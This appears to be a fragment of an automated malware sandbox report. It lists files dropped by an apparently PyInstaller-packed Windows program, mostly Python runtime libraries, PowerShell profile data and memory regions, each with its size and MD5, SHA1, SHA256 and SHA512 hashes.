  SHA512: 95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: e3161f4edbc9b963debe22e29658050b
  SHA1: 45dbf88dadafe5dd1cfee1e987c8a219d3208cdb
  SHA256: 1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
  SHA512: 006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 6e09573715495338a569f0316d59af57
  SHA1: 1a9fd3073801c241b276cdb8b3d7035afbcd0c8d
  SHA256: bdad2d4c1b3475754cb3b9ef41a9eda243f46e30117539f81399c977a459b570
  SHA512: 61add4e0cfef5f138e95f0d941c39c0bce038a47fbc262d5622a0fdf46621231653adfcca3b81bef3a662a37c288e1e9644bed44591551aea5399a370afaeced

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 0aa63dbb46d451e47a7a682c64af776d

                                                                                              SHA1

                                                                                              3b0026f2dae8e9c491ccaa40133755779de35aaa

                                                                                              SHA256

                                                                                              9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b

                                                                                              SHA512

                                                                                              4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\VCRUNTIME140.dll

                                                                                              Filesize

                                                                                              116KB

                                                                                              MD5

                                                                                              be8dbe2dc77ebe7f88f910c61aec691a

                                                                                              SHA1

                                                                                              a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                              SHA256

                                                                                              4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                              SHA512

                                                                                              0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_bz2.pyd

                                                                                              Filesize

                                                                                              83KB

                                                                                              MD5

                                                                                              223fd6748cae86e8c2d5618085c768ac

                                                                                              SHA1

                                                                                              dcb589f2265728fe97156814cbe6ff3303cd05d3

                                                                                              SHA256

                                                                                              f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

                                                                                              SHA512

                                                                                              9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_cffi_backend.cp312-win_amd64.pyd

                                                                                              Filesize

                                                                                              178KB

                                                                                              MD5

                                                                                              0572b13646141d0b1a5718e35549577c

                                                                                              SHA1

                                                                                              eeb40363c1f456c1c612d3c7e4923210eae4cdf7

                                                                                              SHA256

                                                                                              d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

                                                                                              SHA512

                                                                                              67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_ctypes.pyd

                                                                                              Filesize

                                                                                              122KB

                                                                                              MD5

                                                                                              bbd5533fc875a4a075097a7c6aba865e

                                                                                              SHA1

                                                                                              ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

                                                                                              SHA256

                                                                                              be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

                                                                                              SHA512

                                                                                              23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_decimal.pyd

                                                                                              Filesize

                                                                                              245KB

                                                                                              MD5

                                                                                              3055edf761508190b576e9bf904003aa

                                                                                              SHA1

                                                                                              f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890

                                                                                              SHA256

                                                                                              e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577

                                                                                              SHA512

                                                                                              87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_hashlib.pyd

                                                                                              Filesize

                                                                                              64KB

                                                                                              MD5

                                                                                              eedb6d834d96a3dffffb1f65b5f7e5be

                                                                                              SHA1

                                                                                              ed6735cfdd0d1ec21c7568a9923eb377e54b308d

                                                                                              SHA256

                                                                                              79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2

                                                                                              SHA512

                                                                                              527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_lzma.pyd

                                                                                              Filesize

                                                                                              156KB

                                                                                              MD5

                                                                                              05e8b2c429aff98b3ae6adc842fb56a3

                                                                                              SHA1

                                                                                              834ddbced68db4fe17c283ab63b2faa2e4163824

                                                                                              SHA256

                                                                                              a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c

                                                                                              SHA512

                                                                                              badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_socket.pyd

                                                                                              Filesize

                                                                                              81KB

                                                                                              MD5

                                                                                              dc06f8d5508be059eae9e29d5ba7e9ec

                                                                                              SHA1

                                                                                              d666c88979075d3b0c6fd3be7c595e83e0cb4e82

                                                                                              SHA256

                                                                                              7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

                                                                                              SHA512

                                                                                              57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\base_library.zip

                                                                                              Filesize

                                                                                              1.3MB

                                                                                              MD5

                                                                                              08332a62eb782d03b959ba64013ac5bc

                                                                                              SHA1

                                                                                              b70b6ae91f1bded398ca3f62e883ae75e9966041

                                                                                              SHA256

                                                                                              8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288

                                                                                              SHA512

                                                                                              a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\cryptography\hazmat\bindings\_rust.pyd

                                                                                              Filesize

                                                                                              6.9MB

                                                                                              MD5

                                                                                              61d63fbd7dd1871392997dd3cef6cc8e

                                                                                              SHA1

                                                                                              45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9

                                                                                              SHA256

                                                                                              ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5

                                                                                              SHA512

                                                                                              c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\libcrypto-3.dll

                                                                                              Filesize

                                                                                              5.0MB

                                                                                              MD5

                                                                                              e547cf6d296a88f5b1c352c116df7c0c

                                                                                              SHA1

                                                                                              cafa14e0367f7c13ad140fd556f10f320a039783

                                                                                              SHA256

                                                                                              05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

                                                                                              SHA512

                                                                                              9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\libffi-8.dll

                                                                                              Filesize

                                                                                              38KB

                                                                                              MD5

                                                                                              0f8e4992ca92baaf54cc0b43aaccce21

                                                                                              SHA1

                                                                                              c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                                                                                              SHA256

                                                                                              eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                                                                                              SHA512

                                                                                              6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\python3.DLL

                                                                                              Filesize

                                                                                              66KB

                                                                                              MD5

                                                                                              79b02450d6ca4852165036c8d4eaed1f

                                                                                              SHA1

                                                                                              ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

                                                                                              SHA256

                                                                                              d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

                                                                                              SHA512

                                                                                              47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\python312.dll

                                                                                              Filesize

                                                                                              6.6MB

                                                                                              MD5

                                                                                              3c388ce47c0d9117d2a50b3fa5ac981d

                                                                                              SHA1

                                                                                              038484ff7460d03d1d36c23f0de4874cbaea2c48

                                                                                              SHA256

                                                                                              c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

                                                                                              SHA512

                                                                                              e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\select.pyd

                                                                                              Filesize

                                                                                              29KB

                                                                                              MD5

                                                                                              92b440ca45447ec33e884752e4c65b07

                                                                                              SHA1

                                                                                              5477e21bb511cc33c988140521a4f8c11a427bcc

                                                                                              SHA256

                                                                                              680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

                                                                                              SHA512

                                                                                              40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\unicodedata.pyd

                                                                                              Filesize

                                                                                              1.1MB

                                                                                              MD5

                                                                                              16be9a6f941f1a2cb6b5fca766309b2c

                                                                                              SHA1

                                                                                              17b23ae0e6a11d5b8159c748073e36a936f3316a

                                                                                              SHA256

                                                                                              10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

                                                                                              SHA512

                                                                                              64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxzp20l4.1nd.ps1

                                                                                              Filesize

                                                                                              60B

                                                                                              MD5

                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                              SHA1

                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                              SHA256

                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                              SHA512

                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                            • memory/1680-197-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

                                                                                              Filesize

                                                                                              1.0MB

                                                                                            • memory/1680-207-0x000001BE11BC0000-0x000001BE11BE2000-memory.dmp

                                                                                              Filesize

                                                                                              136KB

                                                                                            • memory/1680-210-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

                                                                                              Filesize

                                                                                              1.0MB